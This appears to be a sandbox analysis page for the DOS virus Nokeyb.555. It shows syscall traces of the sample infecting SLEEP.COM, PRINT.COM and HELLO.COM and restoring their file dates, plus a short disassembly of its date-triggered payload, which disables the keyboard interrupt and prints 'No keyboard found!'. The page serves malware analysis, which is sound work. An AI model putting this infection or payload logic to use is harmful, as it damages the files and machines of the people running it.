Sample viewer

vx.netlux.org/Virus.DOS.Nokeyb.555

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:24.575327405Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.578713416Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.582554254Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.583559874Z 78 PC: 12b27 | Find first file
2018-12-17T22:06:24.596198123Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.61411543Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:06:24.625615466Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.632247494Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.634377917Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.636947445Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.638317001Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.641335414Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.644384593Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.652738146Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.656179277Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.657827031Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.662590795Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.67113294Z 79 PC: 12b31 | Find next file
2018-12-17T22:06:24.674298431Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.684033103Z 61 PC: 12b5a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:06:24.692106239Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.698608683Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.700110147Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.703849259Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.70541288Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.707959237Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.712689022Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.720414753Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.722948774Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.724348251Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.729167895Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.736703225Z 79 PC: 12b31 | Find next file
2018-12-17T22:06:24.739206395Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.750359048Z 61 PC: 12b5a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:06:24.758282362Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.765357424Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.774691458Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.777559953Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.779364559Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.786411276Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.789651696Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.797911996Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.801954766Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.803441091Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.808201178Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.816452628Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
0x12a90: jne 0x12aa5
0x12a92: mov ah, 9
0x12a94: lea dx, word ptr [bp + 0x303]
0x12a98: int 0x21
0x12a9a: in al, 0x21
0x12a9c: or al, 2
0x12a9e: out 0x21, al
0x12aa0: mov ax, 0x4c00
0x12aa3: int 0x21
0x12aa5: mov ah, 0x1a
0x12aa7: mov dx, 0x80
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b
0x12aae: lea dx, word ptr [bp + 0x35a]
0x12ab2: int 0x21
0x12ab4: mov di, 0x100
0x12ab7: lea si, word ptr [bp + 0xfc]
0x12abb: movsd dword ptr es:[di], dword ptr [si]
0x12abd: push 0x100
2018-12-17T22:06:24.81845767Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.819464632Z 59 PC: 12ab4 | Change current directory
2018-12-17T22:06:24.821748517Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.824472031Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.828635883Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.830079714Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
0x12a90: jne 0x12aa5
0x12a92: mov ah, 9
0x12a94: lea dx, word ptr [bp + 0x303]
0x12a98: int 0x21
0x12a9a: in al, 0x21
0x12a9c: or al, 2
0x12a9e: out 0x21, al
0x12aa0: mov ax, 0x4c00
0x12aa3: int 0x21
0x12aa5: mov ah, 0x1a
0x12aa7: mov dx, 0x80
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b
0x12aae: lea dx, word ptr [bp + 0x35a]
0x12ab2: int 0x21
0x12ab4: mov di, 0x100
0x12ab7: lea si, word ptr [bp + 0xfc]
0x12abb: movsd dword ptr es:[di], dword ptr [si]
0x12abd: push 0x100
2018-12-17T22:06:24.83208609Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.833005281Z 59 PC: 12ab4 | Change current directory
2018-12-17T22:06:24.8353304Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.843473608Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.847832296Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.851583556Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
0x12a90: jne 0x12aa5
0x12a92: mov ah, 9
0x12a94: lea dx, word ptr [bp + 0x303]
0x12a98: int 0x21
0x12a9a: in al, 0x21
0x12a9c: or al, 2
0x12a9e: out 0x21, al
0x12aa0: mov ax, 0x4c00
0x12aa3: int 0x21
0x12aa5: mov ah, 0x1a
0x12aa7: mov dx, 0x80
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b
0x12aae: lea dx, word ptr [bp + 0x35a]
0x12ab2: int 0x21
0x12ab4: mov di, 0x100
0x12ab7: lea si, word ptr [bp + 0xfc]
0x12abb: movsd dword ptr es:[di], dword ptr [si]
0x12abd: push 0x100
2018-12-17T22:06:24.85396643Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.855006158Z 59 PC: 12ab4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1838,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:28.469347397Z 71 PC: 12a7a | Get current directory
2018-12-25T11:44:28.473014826Z 59 PC: 12a82 | Change current directory
2018-12-25T11:44:28.477368978Z 26 PC: 12aca | Set disk transfer address
2018-12-25T11:44:28.478569358Z 78 PC: 12b27 | Find first file
2018-12-25T11:44:28.491059931Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:44:28.757049795Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:28.764972318Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:28.77323516Z 66 PC: 12b81 | Move file pointer
2018-12-25T11:44:28.775778906Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.779323704Z 66 PC: 12b97 | Move file pointer
2018-12-25T11:44:28.78123272Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:44:28.796434096Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.80013302Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-25T11:44:28.808978613Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-25T11:44:28.812670512Z 87 PC: 12c1b | Get or set file date and time
2018-12-25T11:44:28.814831123Z 67 PC: 12c28 | Get or set file attributes
2018-12-25T11:44:28.821724972Z 62 PC: 12c2c | Close file
2018-12-25T11:44:29.132165617Z 79 PC: 12b31 | Find next file
2018-12-25T11:44:29.13523008Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.146876407Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.155741385Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.162997107Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.164692791Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.168989672Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.171154204Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.174386812Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.178559074Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.188833194Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.191916787Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.194514888Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.201092414Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.213094034Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T11:44:29.216160046Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.228873392Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.236566787Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.244021645Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.246571192Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.249684832Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.251395504Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.255192128Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.260983717Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.2703909Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.273386326Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.275994045Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.281154529Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.289871445Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
0x12a90: jne 0x12aa5
0x12a92: mov ah, 9
0x12a94: lea dx, word ptr [bp + 0x303]
0x12a98: int 0x21
0x12a9a: in al, 0x21
0x12a9c: or al, 2
0x12a9e: out 0x21, al
0x12aa0: mov ax, 0x4c00
0x12aa3: int 0x21
0x12aa5: mov ah, 0x1a
0x12aa7: mov dx, 0x80
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b
0x12aae: lea dx, word ptr [bp + 0x35a]
0x12ab2: int 0x21
0x12ab4: mov di, 0x100
0x12ab7: lea si, word ptr [bp + 0xfc]
0x12abb: movsd dword ptr es:[di], dword ptr [si]
0x12abd: push 0x100
2018-12-25T11:44:29.293673212Z 26 PC: 12aac | Set disk transfer address
2018-12-25T11:44:29.294909914Z 59 PC: 12ab4 | Change current directory
2018-12-25T11:44:29.297262667Z 71 PC: 12a7a | Get current directory (See above)
2018-12-25T11:44:29.301126186Z 59 PC: 12a82 | Change current directory (See above)
2018-12-25T11:44:29.305889983Z 26 PC: 12aca | Set disk transfer address (See above)
2018-12-25T11:44:29.307384396Z 26 PC: 12aac | Set disk transfer address (See above)
2018-12-25T11:44:29.309854123Z 59 PC: 12ab4 | Change current directory (See above)

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1838,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:28.497751514Z 71 PC: 12a7a | Get current directory
2018-12-25T11:44:28.502437287Z 59 PC: 12a82 | Change current directory
2018-12-25T11:44:28.506831332Z 26 PC: 12aca | Set disk transfer address
2018-12-25T11:44:28.507902144Z 78 PC: 12b27 | Find first file
2018-12-25T11:44:28.514758118Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:44:28.756612207Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:28.763984548Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:28.771330805Z 66 PC: 12b81 | Move file pointer
2018-12-25T11:44:28.773217549Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.776657719Z 66 PC: 12b97 | Move file pointer
2018-12-25T11:44:28.778561668Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:44:28.78215121Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.785600276Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-25T11:44:28.79483186Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-25T11:44:28.799169927Z 87 PC: 12c1b | Get or set file date and time
2018-12-25T11:44:28.80145339Z 67 PC: 12c28 | Get or set file attributes
2018-12-25T11:44:28.806949701Z 62 PC: 12c2c | Close file
2018-12-25T11:44:28.977019296Z 79 PC: 12b31 | Find next file
2018-12-25T11:44:28.980598359Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.132247709Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.140571638Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.149254187Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.151076128Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.154382421Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.156828234Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.159491835Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.163648197Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.173678511Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.176960657Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.179143848Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.185530904Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.195233078Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T11:44:29.198294073Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.21205617Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.219740646Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.227496313Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.229867247Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.233119543Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.234989392Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.238010063Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.242082583Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.250965017Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.254489352Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.257205862Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.262488911Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.271042797Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
0x12a90: jne 0x12aa5
0x12a92: mov ah, 9
0x12a94: lea dx, word ptr [bp + 0x303]
0x12a98: int 0x21
0x12a9a: in al, 0x21
0x12a9c: or al, 2
0x12a9e: out 0x21, al
0x12aa0: mov ax, 0x4c00
0x12aa3: int 0x21
0x12aa5: mov ah, 0x1a
0x12aa7: mov dx, 0x80
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b
0x12aae: lea dx, word ptr [bp + 0x35a]
0x12ab2: int 0x21
0x12ab4: mov di, 0x100
0x12ab7: lea si, word ptr [bp + 0xfc]
0x12abb: movsd dword ptr es:[di], dword ptr [si]
0x12abd: push 0x100
2018-12-25T11:44:29.274902809Z 9 PC: 12a9a | Display string (String= 'No keyboard found! ')
2018-12-25T11:44:29.279216241Z 76 PC: 12aa5 | Terminate with return code (Return code = '0')